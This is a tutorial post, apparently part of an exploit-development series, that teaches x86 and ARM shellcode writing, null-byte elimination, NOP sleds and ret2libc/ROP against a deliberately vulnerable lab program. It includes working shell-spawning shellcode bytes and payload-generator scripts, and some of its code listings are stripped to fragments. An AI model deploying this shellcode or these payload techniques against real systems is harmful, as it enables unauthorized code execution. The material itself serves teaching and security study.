Introduction to exploit development - Part 3: Shellcode
Overview
In Part 2, we learned how stack-based buffer overflows enable control flow hijacking by corrupting saved return addresses, and we demonstrated redirecting execution to existing functions in the target program. While interesting, this is limiting: we can only jump to code that already exists in the program.
The next step is shellcode: custom machine instructions injected into a vulnerable program's memory and executed to achieve arbitrary code execution. This post explores shellcode development for both x86 and ARM architectures, covering:
- Assembly fundamentals and system call interfaces
- Writing position-independent shellcode that spawns shells
- Eliminating null bytes that terminate string operations
- NOP sled technique for reliable exploitation
- Return-Oriented Programming (ROP) when the stack is non-executable
- Testing and debugging shellcode effectively
All x86 work below uses the Debian i386 VM, while ARM work uses the Debian armhf VM or Raspberry Pi configured in Part 1.
A bit or two of assembly
Before writing shellcode, we review basic assembly for both architectures by implementing a simple "Hello, World!" program that uses system calls directly.
x86 hello world
hello.s (x86 AT&T syntax):
.section .data
msg:
.ascii "Hello, World!\n"
msg_len = . - msg
.section .text
.globl _start
_start:
# write(1, msg, msg_len)
movl $4, %eax # syscall number for write
movl $1, %ebx # file descriptor 1 (stdout)
leal msg, %ecx # pointer to message
movl $msg_len, %edx # message length
int $0x80 # invoke syscall
# exit(0)
movl $1, %eax # syscall number for exit
xorl %ebx, %ebx # exit code 0
int $0x80 # invoke syscall
Assemble, link, and execute:
# Output: Hello, World!
Key concepts:
- System calls: On 32-bit x86 Linux, system calls are invoked via the int $0x80 interrupt
- Calling convention: Syscall number in eax, arguments in ebx, ecx, edx, esi, edi, ebp (in that order)
- Return value: Returned in eax
Reference: Linux x86 syscall table
ARM hello world
hello.s (ARM):
.section .data
msg:
.ascii "Hello, World!\n"
.set msg_len, . - msg
.section .text
.globl _start
_start:
# write(1, msg, msg_len)
mov r7, #4 @ syscall number for write
mov r0, #1 @ file descriptor 1 (stdout)
ldr r1, =msg @ pointer to message
ldr r2, =msg_len @ message length
svc #0 @ invoke syscall (supervisor call)
# exit(0)
mov r7, #1 @ syscall number for exit
mov r0, #0 @ exit code 0
svc #0 @ invoke syscall
Assemble, link, and execute:
# Output: Hello, World!
Key concepts:
- System calls: On ARM Linux, system calls are invoked via svc #0 (supervisor call, formerly swi)
- Calling convention: Syscall number in r7, arguments in r0, r1, r2, r3, r4, r5, r6 (in that order)
- Return value: Returned in r0
Reference: Linux ARM syscall table
These examples demonstrate the fundamental differences between x86 and ARM assembly and their system call interfaces, details we must account for when writing our shellcode in the following sections.
Testing shellcode
Before developing shellcode, we need a way to test it. Originally, I used a C program to help with this (based off of code from Hacking by Jon Erickson), but later created a more flexible Python script to speed things up. I've included both below:
C shellcode test harness
shellcode.c
// Replace with your shellcode bytes
unsigned char shellcode[] =
"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"
"\x53\x89\xe1\xb0\x0b\xcd\x80";
int
Compile with executable stack:
This approach is simple but requires recompilation for each shellcode test. The executable stack flag (-z execstack) is required to allow code execution from the data segment where our shellcode array resides.
Python shellcode test harness
A more flexible approach is using Python's ctypes library to manipulate memory protection and execute shellcode directly. This is shown via the test_shellcode function in the shellcode.py script below. The script also includes some useful helper functions that we'll use later; you can ignore them for now.
shellcode.py
#!/usr/bin/env python3
"""
Convert a string or bytes object to little endian hex representation.
Example: string_to_little_endian_hex("/bin") -> 0x6e69622f
Args:
data: String or bytes to convert to hex
"""
# Encode string to bytes if needed
=
# Convert to hex and reverse byte order for little endian
=
=
"""
Extract shellcode opcodes from an assembled and linked executable.
IMPORTANT: Link your executable with the -N flag:
ld your_program.o -N -o your_program
Args:
executable_name: Name of the executable to extract opcodes from
bytes_only: If True, print only the hex bytes (compatible with test command)
"""
=
# Create binary file using objcopy
=
return
# Read binary data and format as shellcode
=
# Print hex bytes only (no 0x prefix, no \x separators)
# Print with length and \x format
=
# Clean up temporary file
"""
Create an executable function from shellcode bytes.
Marks memory pages as executable and returns a callable function pointer.
Args:
shellcode_bytes: Bytes object containing assembly opcodes
Returns:
Callable function that executes the shellcode
"""
# Create C buffer and cast to function pointer
=
=
# Get function address and libc instance
= .
=
=
# Calculate page-aligned starting address
= *
# Mark all pages containing shellcode as executable (READ|WRITE|EXEC)
assert == 0
return
=
=
=
=
This script uses mprotect() to mark the memory page containing our shellcode as executable, eliminating the need for -z execstack. This is more representative of real-world exploitation where we mark specific memory regions executable rather than the entire stack.
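The page-alignment step is the part that is easiest to get wrong, so here is a minimal sketch of it in isolation. It assumes Linux and a libc that exposes mprotect(); the names page_span and make_callable are illustrative and are not the functions from shellcode.py.

```python
import ctypes
import mmap

# Protection flag values from <sys/mman.h> on Linux
PROT_READ, PROT_WRITE, PROT_EXEC = 0x1, 0x2, 0x4


def page_span(addr, length, page_size=mmap.PAGESIZE):
    """Return (start, size) of the page-aligned region covering [addr, addr + length)."""
    start = addr & ~(page_size - 1)                             # round down
    end = (addr + length + page_size - 1) & ~(page_size - 1)    # round up
    return start, end - start


def make_callable(shellcode_bytes):
    """Hypothetical helper: copy shellcode into a buffer and mark its pages RWX.

    Returns (function, buffer); keep the buffer referenced so it is not freed.
    """
    buf = ctypes.create_string_buffer(shellcode_bytes, len(shellcode_bytes))
    addr = ctypes.addressof(buf)
    start, size = page_span(addr, len(shellcode_bytes))

    libc = ctypes.CDLL(None, use_errno=True)
    libc.mprotect.argtypes = (ctypes.c_void_p, ctypes.c_size_t, ctypes.c_int)
    libc.mprotect.restype = ctypes.c_int
    if libc.mprotect(start, size, PROT_READ | PROT_WRITE | PROT_EXEC) != 0:
        raise OSError(ctypes.get_errno(), "mprotect failed")

    return ctypes.CFUNCTYPE(None)(addr), buf
```

mprotect() only accepts page-aligned start addresses, which is why the buffer address is rounded down and the length rounded up. Calling the returned function only makes sense with shellcode built for the machine the script runs on.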
Writing shellcode: x86
Shellcode development follows a process:
- Identify the goal (e.g., spawn a shell)
- Determine required system calls
- Write assembly that achieves the goal
- Eliminate problematic bytes (null bytes, newlines, etc.)
- Extract opcodes and test
Our goal in this series will always be to spawn a /bin/sh shell using the execve() system call.
Understanding execve()
The execve() system call replaces the current process with a new program:
int execve(const char *pathname, char *const argv[], char *const envp[]);
To spawn a shell:
- pathname: pointer to string "/bin/sh"
- argv: array containing ["/bin/sh", NULL]
- envp: can be NULL
On x86:
- Syscall number: 11 (0xb)
- Arguments: ebx = pathname, ecx = argv, edx = envp
First attempt: bad_shell.s (x86)
bad_shell.s
.data
shell: .ascii "/bin/shX"
.text
.global _start
_start:
### Intended call: execve("/bin/sh", NULL, NULL); ###
### Note: %edx (envp) is never set here, so it keeps its value from process startup ###
mov $11, %eax # Store syscall for execve (11) in %eax
mov $shell, %ebx # Store string of executable we want to execute in %ebx
movb $0, 7(%ebx) # Overwrite the trailing X of "/bin/shX" with a NULL byte
mov $0, %ecx # Store NULL in %ecx
int $0x80 # Interrupt to make the syscall
### exit(0); ###
movl $1, %eax # Store syscall for exit (1) in %eax
movl $0, %ebx # Store the exit value we want to return in %ebx
int $0x80 # Interrupt to make the syscall
Assemble, link, and test:
# Should spawn a shell
This works, but let's examine the opcodes.
Using objdump:
# objdump -d bad_shell
)
Using shellcode.py:
# ./shellcode.py print bad_shell
\x
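The disassembly reveals a whopping 16 null bytes (\x00). A null byte ends C string operations such as strcpy() and strcat(), so a vulnerable copy would stop at the first \x00 and never place the rest of our shellcode in memory. (Line-oriented readers like gets() stop at a newline instead, which is why newlines are on the list of problematic bytes too.) They gotta go.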
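Counting bad bytes by eye in a disassembly is error-prone, so a tiny scanner helps. The sketch below is a stand-alone illustration (the function name is made up here); the two sample encodings are the standard x86 encodings of mov $11, %eax and mov $11, %al.

```python
def bad_byte_offsets(code, bad=b"\x00"):
    """Return the offset of every byte in `code` that also appears in `bad`."""
    return [i for i, b in enumerate(code) if b in bad]


mov_eax = bytes.fromhex("b80b000000")  # mov $11, %eax (32-bit immediate)
mov_al = bytes.fromhex("b00b")         # mov $11, %al  (8-bit immediate)

print(bad_byte_offsets(mov_eax))  # [2, 3, 4]
print(bad_byte_offsets(mov_al))   # []
```

Passing a different `bad` set, for example b"\x00\n", covers targets where the input is read line by line.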
Eliminating null bytes: good_shell.s (x86)
To get rid of null bytes, we can apply some of the following techniques:
- XOR for zeroing: Instead of mov $0, %eax, use xor %eax, %eax
- Push strings onto stack: Instead of referencing the data segment, construct strings on the stack at runtime
- Clever arithmetic: Build values through arithmetic instead of direct assignment
Let's see an example of this:
good_shell.s
.text
.global _start
_start:
### execve("/bin/sh", ["/bin/sh", NULL], NULL); ###
xor %eax, %eax # XOR %eax with itself, zeroing it out
push %eax # Push %eax (NULL) onto the stack
push $0x68732f2f # Push "//sh" onto the stack
push $0x6e69622f # Push "/bin" onto the stack, %esp now points to it
mov %esp, %ebx # %ebx now holds the starting address of "/bin//sh"
push %eax # Push %eax (NULL) onto the stack
push %ebx # Push %ebx (pointer to "/bin//sh\0") onto the stack, %esp now points to it
mov %esp, %ecx # %ecx now holds starting address of ["/bin//sh", NULL]
xor %edx, %edx # XOR %edx with itself, zeroing it out
mov $11, %al # Store syscall for execve (11) in %eax, via %al
int $0x80 # Interrupt to make the syscall
### exit(0); ###
xor %eax, %eax # XOR %eax with itself, zeroing it out
mov $1, %al # Store syscall for exit (1) in %eax, via %al
xor %ebx, %ebx # Store the exit value we want to return in %ebx by XORing it to get 0
int $0x80 # Interrupt to make the syscall
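The two push immediates in the listing above are simply the string's bytes read as little-endian 32-bit integers, pushed last chunk first because the stack grows downward. A minimal Python sketch of that conversion follows; the function names are illustrative and are not the helpers from shellcode.py.

```python
def to_push_immediate(chunk):
    """Interpret exactly 4 bytes as a little-endian 32-bit integer."""
    data = chunk.encode() if isinstance(chunk, str) else chunk
    if len(data) != 4:
        raise ValueError("expected exactly 4 bytes")
    return int.from_bytes(data, "little")


def push_sequence(text):
    """Split `text` into 4-byte chunks and return push immediates, last chunk first."""
    data = text.encode()
    if len(data) % 4:
        raise ValueError("pad the string to a multiple of 4 (e.g. /bin//sh)")
    chunks = [data[i:i + 4] for i in range(0, len(data), 4)]
    return [hex(to_push_immediate(c)) for c in reversed(chunks)]


print(push_sequence("/bin//sh"))  # ['0x68732f2f', '0x6e69622f']
```

The doubled slash in "/bin//sh" pads the path to eight bytes without changing its meaning, which avoids a partial chunk that would need a null byte.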
Assemble:
Extract the opcodes and check for null bytes (again, you can use objdump, or the print option from the shellcode.py script given earlier):
As you'll see, no null bytes!
Final x86 shellcode (33 bytes):
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80
Test this shellcode using the Python shellcode.py script given earlier:
# Should spawn a shell
Writing shellcode: ARM
ARM has some obvious differences compared to x86, namely:
- Different instruction encoding and addressing modes
- Thumb mode (16-bit instructions) can reduce null bytes
- Branch instructions for mode switching
First attempt: bad_shell.s (ARM)
bad_shell.s
.syntax unified
.data
shell: .ascii "/bin/sh\0"
.text
.global _start
_start:
.code 32
@@@ execve("/bin/sh", 0, 0); @@@
ldr r0, shell_addr @ Load executable we want to execute in r0
mov r1, 0 @ Store NULL in r1
mov r2, 0 @ Store NULL in r2
mov r7, 11 @ Store the syscall for execve (11) in r7
swi 0 @ Software interrupt to make the syscall
@@@ exit(0); @@@
mov r0, 0 @ Store the exit value we want to return in r0
mov r7, 1 @ Store the syscall for exit (1) in r7
swi 0 @ Software interrupt to make the syscall
shell_addr:
.word shell
Assemble and test:
Check for null bytes:
\x
We find 14 null bytes. Time to get creative.
Eliminating null bytes: good_shell.s (ARM)
For better ARM shellcode, we'll apply several techniques (some of which are similar to what we did for x86):
- Switch to Thumb mode: Use 16-bit instructions to reduce null bytes
- Program-relative addressing: Used to load string addresses
- XOR for zeroing: Use eor (exclusive OR) to zero registers instead of direct assignment
- Writable .text section: We'll store string data in the .text section and use relative addressing. Note that this requires a writable text segment (via the -N linker flag) to test
good_shell.s
.section .text
.global _start
_start:
.code 32
add r3, pc, #1 @ Store PC + 1 in r3 (address of the Thumb code with the LSB set)
bx r3 @ Branch and exchange to switch to Thumb mode (LSB = 1)
.code 16
@@@ execve("/bin/sh", NULL, NULL); @@@
add r0, pc, #8 @ Use program-relative addressing to load the address of our string into r0
eor r1, r1, r1 @ XOR r1 with itself, zeroing it out
eor r2, r2, r2 @ XOR r2 with itself, zeroing it out
strb r2, [r0, #7] @ Overwrite the last byte of "/bin/shX" with 0 (NULL)
mov r7, #11 @ Store syscall for execve (11) in r7
svc #1 @ Supervisor call to make the syscall (#1 rather than #0 keeps a null byte out of the encoding)
.ascii "/bin/shX"
Assemble with writable text section:
Extract the opcodes and check for null bytes:
Final ARM shellcode (28 bytes):
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x58
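It is worth checking that add r0, pc, #8 really lands on the string, because Thumb PC-relative arithmetic is easy to miscount: the PC reads as the instruction's address plus 4, rounded down to a multiple of 4, and the encoded immediate is a word count. The sketch below decodes that one instruction from the bytes above; the helper name is made up for this example.

```python
import struct

ARM_SHELLCODE = bytes.fromhex(
    "01308fe2" "13ff2fe1"   # ARM:   add r3, pc, #1 ; bx r3
    "02a0" "4940" "5240"    # Thumb: add r0, pc, #8 ; eor r1, r1 ; eor r2, r2
    "c271" "0b27" "01df"    # Thumb: strb r2, [r0, #7] ; mov r7, #11 ; svc #1
    "2f62696e2f736858"      # "/bin/shX"
)


def thumb_adr_target(code, offset):
    """Offset that a 16-bit Thumb 'add rd, pc, #imm' located at `offset` resolves to."""
    (halfword,) = struct.unpack_from("<H", code, offset)
    if halfword >> 11 != 0b10100:
        raise ValueError("not a 16-bit 'add rd, pc, #imm' instruction")
    imm = (halfword & 0xFF) * 4     # imm8 is stored as a count of 4-byte words
    pc = (offset + 4) & ~3          # Thumb PC reads as instruction + 4, word-aligned
    return pc + imm


target = thumb_adr_target(ARM_SHELLCODE, 8)
print(target, ARM_SHELLCODE[target:])  # 20 b'/bin/shX'
```

If an instruction is added or removed before the string, the #8 immediate has to be recomputed the same way.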
Test this shellcode using the Python shellcode.py script given earlier:
# Should spawn a shell
Exploiting
Now that we have working shellcode, we face a problem: how do we actually get a vulnerable program to execute it? In Part 2, we exploited buffer overflows by redirecting the saved return address to existing functions. But now we want to inject our custom shellcode into memory and execute it.
The challenge is that we need to know the exact memory address where our shellcode resides. If we overwrite the return address with the wrong value, the program crashes instead of executing our shellcode. This is tricky because:
- Stack addresses vary based on environment variables, command-line arguments, and program state
- We rarely have perfect information about where our injected data ends up
- Even small miscalculations cause crashes instead of exploitation
The so-called NOP sled technique solves this problem by making exploitation more reliable when we don't know the exact address where our shellcode will land in memory.
NOP sleds
A NOP sled is a sequence of NOP (No Operation) instructions preceding our shellcode. When the program jumps into the NOP sled, execution "slides" through the NOPs until reaching our shellcode.
Why this helps: When exploiting real programs, we often don't know the exact stack address where our shellcode begins. Environment variables, command-line arguments, and ASLR (when enabled) affect stack layout. A large NOP sled means we only need to jump somewhere in the sled - any address within hundreds of bytes works.
NOP opcodes:
- x86: \x90 (one byte, simple)
- ARM: More complex - ARM doesn't have single-byte NOPs. Common alternatives:
  - mov r1, r1 (four bytes: \x01\x10\xa0\xe1)
  - Must be 4-byte aligned for ARM execution mode
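As a minimal sketch, building a sled is just byte repetition, with one extra check so the sled length is a whole number of NOP instructions. The build_sled name is illustrative; the shellcode bytes are the final x86 and ARM payloads from earlier in this post.

```python
X86_NOP = b"\x90"
ARM_NOP = b"\x01\x10\xa0\xe1"  # mov r1, r1 (ARM mode, 4 bytes)

X86_SHELLCODE = bytes.fromhex(
    "31c050682f2f7368682f62696e89e3505389e131d2b00bcd8031c0b00131dbcd80"
)
ARM_SHELLCODE = bytes.fromhex(
    "01308fe213ff2fe102a049405240c2710b2701df2f62696e2f736858"
)


def build_sled(shellcode, sled_len=1000, nop=X86_NOP):
    """Return `sled_len` bytes of NOP instructions followed by the shellcode."""
    if sled_len % len(nop):
        raise ValueError("sled length must be a multiple of the NOP size")
    return nop * (sled_len // len(nop)) + shellcode


x86_payload = build_sled(X86_SHELLCODE)
arm_payload = build_sled(ARM_SHELLCODE, nop=ARM_NOP)
print(len(x86_payload), len(arm_payload))  # 1033 1028
```

On ARM the multiple-of-4 check matters: a sled cut mid-instruction would leave the shellcode itself misaligned.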
Environment variable injection
Instead of injecting shellcode directly into the vulnerable buffer (which may be too small), we store shellcode in an environment variable and redirect execution to that address.
Export shellcode to environment:
Example on x86:
This creates an environment variable with 1000 NOP instructions followed by our shellcode.
Now we need the memory address of this environment variable. One way to get it is the following helper program (credit goes to Hacking by Jon Erickson):
getenv_addr.c
int
Compile and use:
# Output: SHELLCODE is at address: 0xbeffef55 (example address)
Important: The address will vary slightly between programs due to environment differences. For exploitation, we can just estimate an address in the middle of our NOP sled.
Creating a payload generator
Rather than manually crafting payloads with inline Python, let's use a helper script that consolidates our exploit primitives. The nop.py script given below provides three subcommands:
- shellcode: Generate a NOP sled followed by architecture-specific shellcode
- buffer: Generate a buffer filled with an environment variable's address (for overwriting return addresses)
- debug: Generate an alphabetic pattern for identifying offsets
nop.py
#!/usr/bin/env python3
=
=
"""Convert a hex string to little endian bytes."""
=
return
"""
Print a buffer containing the address of an environment variable.
The function accounts for the difference in program name length between
this script and the target executable, then adds an offset to land inside
the NOP sled rather than at its start.
"""
=
=
=
=
# Program name affects env var memory location - each extra character
# shifts the address. Calculate the difference between this script's
# invocation name and the target program name.
=
= -
# Each character difference shifts the address by 1 byte on the stack.
# Add 500 to land in the middle of a typical 1000-byte NOP sled.
= - + 500
= f
"""Print a warning if NOP sled size is less than 1000 bytes."""
"""
Print a buffer with repeating alphabet characters (AAAABBBBCCCC...).
If the given buf_size is larger than 104 (26 * 4), then the entire
returned buffer is prepended by (buf_size - 104) '@' (ASCII 0x40) characters.
"""
=
"""Print a NOP sled followed by shellcode."""
= b *
=
# ARM NOP instruction (mov r1, r1)
= b *
=
=
=
=
=
=
=
An interesting thing to take note of is the fancy footwork in print_env_buffer(). Environment variable addresses shift based on the program name length, so this script compensates for this difference and adds an offset to land in the middle of the NOP sled rather than guessing manually.
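The address arithmetic described above can be sketched on its own. This is not the code from nop.py: the function names are hypothetical, and the direction of the name-length correction (a longer target name moves the variable to a lower address, one byte per character) is an assumption based on the description in this post. With a 500-byte margin inside a 1000-byte sled, a small error in that correction does not matter.

```python
import struct


def estimate_target(env_addr, own_name, target_name, sled_offset=500):
    """Estimate an address inside the NOP sled as seen by the target program."""
    shift = len(target_name) - len(own_name)   # assumed: 1 byte per extra character
    return env_addr - shift + sled_offset


def address_buffer(addr, total_len=240):
    """Repeat the little-endian 32-bit address until `total_len` bytes are filled."""
    return struct.pack("<I", addr) * (total_len // 4)


# 0xbeffef55 is the example address printed by getenv_addr earlier in the post
target = estimate_target(0xbeffef55, "./nop.py", "./victim")
print(hex(target))  # 0xbefff149
```

Because the buffer is the same 4 bytes repeated, it overwrites the return address correctly as long as the return address sits at a 4-byte-aligned offset within it.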
Exploiting victim.c using NOP sleds
Consider a simple vulnerable program:
victim.c
void
int
Compile:
# x86
# ARM
Now, to actually start exploiting we can follow a general set of steps:
- Export NOP sled + shellcode to an environment variable
- Determine or guess the exploitable buffer (padding) length
- Create the injection payload, including the padding to overwrite the return address + address pointing to NOP sled
- Execute victim with payload
For ARM, there are a few extra considerations to make, as discussed in the next section. But for now, let's focus on x86.
First, determine the padding needed to reach the saved return address. The debug subcommand generates an alphabetic pattern (@@@@@@AAAABBBBCCCC...) that helps identify exact offsets:
# eip 0x58585858 0x58585858
The value 0x58585858 is ASCII for "XXXX", meaning EIP was overwritten by the X's in this case. The pattern repeats each letter 4 times (AAAA at offset 0, BBBB at 4, ..., XXXX at 92), and 16 (120 - 104) @'s are prepended because we specified a buffer size of 120, so the saved return address starts 16 + 92 = 108 bytes into the buffer. A precise payload is therefore 108 bytes of padding followed by the 4-byte address into our NOP sled, 112 bytes in total.
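The offset can also be computed rather than counted by hand. The sketch below rebuilds the pattern as described for the debug subcommand ('@' padding followed by AAAABBBB...ZZZZ) and searches it for the bytes found in EIP. The function names are illustrative, and buffer sizes below 104 are simply rejected because the post does not describe that case.

```python
import string
import struct


def debug_pattern(buf_size):
    """'@' padding followed by each uppercase letter repeated 4 times (104 bytes)."""
    letters = "".join(ch * 4 for ch in string.ascii_uppercase)
    if buf_size < len(letters):
        raise ValueError("this sketch only handles buf_size >= 104")
    return ("@" * (buf_size - len(letters)) + letters).encode()


def offset_of(eip_value, buf_size):
    """Offset in the pattern of the 4 bytes that ended up in EIP, or -1 if absent."""
    needle = struct.pack("<I", eip_value)
    return debug_pattern(buf_size).find(needle)


print(offset_of(0x58585858, 120))  # 108
```

The result is the number of padding bytes that precede the saved return address.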
Now export our shellcode with a 1000-byte NOP sled:
Finally, exploit the vulnerable program. The buffer subcommand generates a buffer filled with the calculated address of our environment variable:
# Should spawn a shell
Victim has been pwned!! But wait, what just happened?
The buffer subcommand did the following:
- Looked up the SHELLCODE environment variable address
- Adjusted for the program name length difference between nop.py and ./victim
- Added an offset to land inside the NOP sled (not at the exact start)
- Generated 240 bytes of this address repeated
- Note how this buffer is much bigger than our precise finding of 108 bytes! That whole process of using GDB to find the exact buffer/padding length was just for fun; we didn't actually need such precision, because the buffer simply repeats the target address over and over
When executed, the overwritten return address points into our NOP sled in the environment variable. Execution slides through NOPs and hits our shellcode, spawning a shell.
ARM NOP sled alignment complications
ARM NOP sleds must be handled a bit differently due to:
- 4-byte alignment requirement: ARM instructions must be 4-byte aligned in ARM mode
- Multi-byte NOP instructions: No single-byte NOP exists
- Address alignment: The environment variable address must also be 4-byte aligned (divisible by 4)
Using nop.py for ARM:
Use nop.py to generate an appropriate ARM NOP sled using the --arch arm flag and store it in an env variable:
This generates 1000 bytes of ARM NOP instructions (mov r1, r1 - encoded as \x01\x10\xa0\xe1) followed by the ARM shellcode. Note that the NOP sled size should be divisible by 4 since each ARM NOP is 4 bytes.
Critical alignment issue: The environment variable address must be 4-byte aligned (divisible by 4). Use getenv_addr to check:
# Output: 0xbefffd3a (example - NOT divisible by 4)
If the address is NOT divisible by 4, export additional environment variables to shift addresses:
# Output: 0xbefffd3c (NOW divisible by 4!)
This manipulation shifts environment variable addresses until alignment is achieved. Only then can we successfully exploit ARM targets with NOP sleds.
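The divisibility check is a one-liner, shown here against the two example addresses above. The helper name is made up for this sketch.

```python
def misalignment(addr, width=4):
    """Number of bytes by which `addr` overshoots the previous `width`-byte boundary."""
    return addr % width


for addr in (0xbefffd3a, 0xbefffd3c):
    off = misalignment(addr)
    status = "aligned" if off == 0 else f"off by {off}"
    print(hex(addr), status)
```

A non-zero result says how far the address is from the previous 4-byte boundary; since how a given DUMMY variable moves the address is easiest to find empirically, re-run getenv_addr after each change.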
Once aligned, exploit as before:
Note that the environment variable addresses will be different inside victim compared to your shell. If you run into BUS ERROR or segmentation errors, try adding additional A's to your DUMMY environment variable and retrying. It'll work after a few retries - trust me!
Return-Oriented Programming (ROP)
NOP sleds require an executable stack (the -z execstack flag we compiled with). Modern systems enable the NX (No-eXecute) bit by default, marking the stack as non-executable, so an attempt to execute shellcode from the stack crashes the program with a segmentation fault.
Return-Oriented Programming (ROP) bypasses this protection by reusing existing executable code in the program and linked libraries. Instead of injecting new code, we chain together short instruction sequences (called gadgets) ending in ret instructions, controlling the sequence via stack manipulation.
ROP fundamentals
The basic idea:
- Overwrite saved return addresses with an address of a gadget in executable memory (like libc)
- The gadget then executes and returns (via ret) to the next address on the stack
- We control the stack, so we control the sequence of gadgets executed
- Chain gadgets to achieve desired behavior (e.g., calling system("/bin/sh"))
For Linux exploitation, this is often called ret2libc (return-to-libc) when specifically targeting libc functions.
ret2libc on x86
Instead of executing shellcode, we call system("/bin/sh") from libc. The system() function executes shell commands, so passing "/bin/sh" spawns a shell.
Required elements:
- Address of system() in libc
- Address of exit() in libc (for clean exit after shell exits)
- Address of string "/bin/sh" (can be in an environment variable, but it also conveniently exists in libc itself)
Stack layout for ret2libc:
[padding to overflow]
[address of system()]
[address of exit()]
[address of "/bin/sh" string]
When the vulnerable function returns:
- Pops system() address into EIP, begins executing system()
- system() reads its return address (sees exit()) and argument (sees "/bin/sh")
- system("/bin/sh") executes, spawning a shell
- When shell exits, execution continues to exit(), cleanly terminating
Finding addresses manually with GDB:
()
()
()
# $1 = {<text variable, no debug info>} 0xb7de2920 <system>
()
# $2 = {<text variable, no debug info>} 0xb7dd1d60 <exit>
()
For the "/bin/sh" string, we can find it directly in libc rather than using an environment variable:
# Find libc path
|
# libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7d96000)
# Search for "/bin/sh" string in libc
# 1234567:/bin/sh
The string offset plus the libc base address gives us the runtime address.
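As a worked example of that arithmetic, the sketch below uses the illustrative values shown above: the libc base printed by ldd, the runtime system() address from GDB, and the placeholder offset 1234567 from grep. Note that grep -b prints a decimal offset. The 0x4c920 symbol offset is not from the post; it is derived here from those example numbers. The sketch also assumes the string's file offset equals its offset from the load base, which should be confirmed for your libc.

```python
def libc_base_from_symbol(runtime_addr, symbol_offset):
    """Load base = runtime address of a symbol minus its offset inside libc."""
    return runtime_addr - symbol_offset


def runtime_address(libc_base, offset):
    """Runtime address of something located `offset` bytes into libc."""
    return libc_base + offset


base = libc_base_from_symbol(0xb7de2920, 0x4c920)  # system() example values
binsh = runtime_address(base, 1234567)             # decimal offset from grep -b
print(hex(base), hex(binsh))  # 0xb7d96000 0xb7ec3687
```

A base that does not end in three zero hex digits (a 4 KiB page boundary) is a sign that the symbol offset and runtime address came from different libc builds.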
Creating a manual exploit:
#!/usr/bin/env python3
# Addresses from GDB
= 0xb7de2920
= 0xb7dd1d60
= 0xb7e12345 # libc base + "/bin/sh" offset
# Build payload
= b * 112 # Padding to reach return address
=
+=
+=
= +
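For reference, here is a self-contained sketch of the same payload layout: padding, then system(), exit(), and the "/bin/sh" pointer, each packed as a little-endian 32-bit value. The addresses are the example values from this section and will differ on your system; the padding length is a parameter because it depends on how victim was compiled. The function names are illustrative.

```python
import struct


def p32(value):
    """Pack an integer as 4 little-endian bytes."""
    return struct.pack("<I", value)


def ret2libc_payload(padding_len, system_addr, exit_addr, binsh_addr):
    """[padding][system][exit (return address for system)][pointer to "/bin/sh"]"""
    return b"A" * padding_len + p32(system_addr) + p32(exit_addr) + p32(binsh_addr)


payload = ret2libc_payload(112, 0xb7de2920, 0xb7dd1d60, 0xb7e12345)
print(len(payload))  # 124
```

The order matters: when system() starts, it expects its return address directly above it on the stack and its first argument right after that, which is why exit() sits between system() and the string pointer.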
Automating ret2libc with rop.py
Manually finding all these addresses is tedious. Instead, let's create a script that automates the entire process:
rop.py
#!/usr/bin/env python3
"""Convert integer to 4-byte little-endian."""
return
"""Get libc path and runtime base address."""
# Find libc path
=
=
# Get symbol offsets from libc
=
=
=
# Get runtime address via GDB to calculate base
=
=
= -
# Find /bin/sh string offset
=
return
"""
x86 ret2libc: arguments on stack.
Stack after overflow: [system][exit][&"/bin/sh"]
"""
return + +
pass # Implemented later in the post
=
=
=
=
=
This script performs a handful of handy things:
- Finds libc path: Uses ldd to locate the linked libc library
- Extracts symbol offsets: Uses nm -D to get system() and exit() offsets from libc
- Calculates runtime base: Runs GDB to get the actual system() address at runtime, then subtracts the offset to find the libc base address
- Locates "/bin/sh": Uses grep -boa to find the string offset within libc
- Builds the ROP chain: Constructs the payload with proper little-endian addresses
- Bruteforces padding: Tries different buffer sizes to find the correct overflow offset
Using rop.py for x86:
First compile the target without the executable stack flag:
Then run the exploit:
The script will try padding lengths from 100 to 130 bytes. When it hits the correct offset, you'll get a shell - without ever executing code from the stack! Not really practical for real hacking, but definitely a time saver!
ret2libc on ARM
ARM ret2libc is significantly more complex because arguments are passed in registers (r0, r1, r2, etc.), not on the stack like x86.
We can't simply overflow with function addresses and arguments. We need ROP gadgets that:
- Pop values from the stack into registers
- Then jump to our target function
The POP instruction as a gadget:
At first glance, POP seems uninteresting. But consider what pop {r0, r4, pc} actually does:
ldr r0, [sp], #4 ; load from stack into r0, increment sp
ldr r4, [sp], #4 ; load from stack into r4, increment sp
ldr pc, [sp], #4 ; load from stack into pc, increment sp
This loads values from the stack into registers - exactly what we need! If we overflow the stack with:
| Gadget address | r0 | r4 | pc |
|---|---|---|---|
| pop {r0, r4, pc} | "/bin/sh" | dummy | system() |
The gadget will pop our controlled values into registers, with r0 containing our argument and pc jumping to system().
Finding gadgets in libc:
We need a gadget containing both r0 (first argument) and pc (jump target), without sp (which would corrupt our stack):
# Dump libc and search for useful POP patterns
|
Or use tools like ROPgadget:
|
# Example output: 0x00018084 : pop {r0, r4, pc}
Thumb mode considerations:
As mentioned before, ARM processors can operate in ARM mode (32-bit instructions) or Thumb mode (16-bit instructions). When jumping to Thumb code, the least significant bit (LSB) of the address must be set to 1. The updates to rop.py below handle this automatically for the system() and exit() addresses.
Extending rop.py for ARM:
The full rop.py script includes ARM support with automatic gadget finding:
"""Find 'pop {r0, ..., pc}' gadget in libc."""
=
=
, =
=
# Need r0 and pc, must not have sp (corrupts stack)
# Prefer smallest gadget (fewer dummy values needed)
, =
return + ,
"""
ARM ret2libc: arguments in registers via ROP gadget.
Chain: [gadget][values to pop into registers...]
"""
, =
=
+=
+= # Thumb bit
+= # Thumb bit
+= b # Dummy for other regs
return
The find_arm_gadget() function:
- Disassembles libc using objdump
- Searches for all pop {...} instructions
- Filters for gadgets containing r0 and pc but not sp
- Selects the smallest gadget (minimizes dummy values needed)
The build_arm_chain() function:
- Finds a suitable gadget
- Builds the chain by iterating through the registers in the gadget
- Places appropriate values for each register (/bin/sh for r0, system() for pc)
- Sets the LSB for Thumb mode addresses
